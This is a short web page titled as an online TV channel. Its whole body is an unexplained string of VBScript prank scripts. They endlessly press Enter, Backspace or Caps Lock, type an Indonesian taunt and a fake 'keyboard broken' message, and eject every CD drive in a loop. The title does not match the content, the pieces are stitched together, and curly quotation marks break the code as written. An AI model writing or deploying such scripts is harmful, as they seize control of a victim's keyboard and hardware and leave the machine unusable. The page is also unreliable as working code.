TV ONLINE MULTI CAHANNEL
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “hihihi...”
WScript.Sleep 500
WshShell.SendKeys “HEY... ”
WScript.Sleep 500
WshShell.SendKeys “, KA”
WScript.Sleep 500
WshShell.SendKeys “MU”
WScript.Sleep 500
WshShell.SendKeys “SE ”
WScript.Sleep 500
WshShell.SendKeys “GE”
WScript.Sleep 500
WshShell.SendKeys “RA”
WScript.Sleep 500
WshShell.SendKeys “LAH”
WScript.Sleep 500
WshShell.SendKeys “BER”
WScript.Sleep 500
WshShell.SendKeys “TO”
WScript.Sleep 500
WshShell.SendKeys ”BAT”
WScript.Sleep 500
WshShell.SendKeys “HI..”
WScript.Sleep 500
WshShell.SendKeys “HI........ “
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop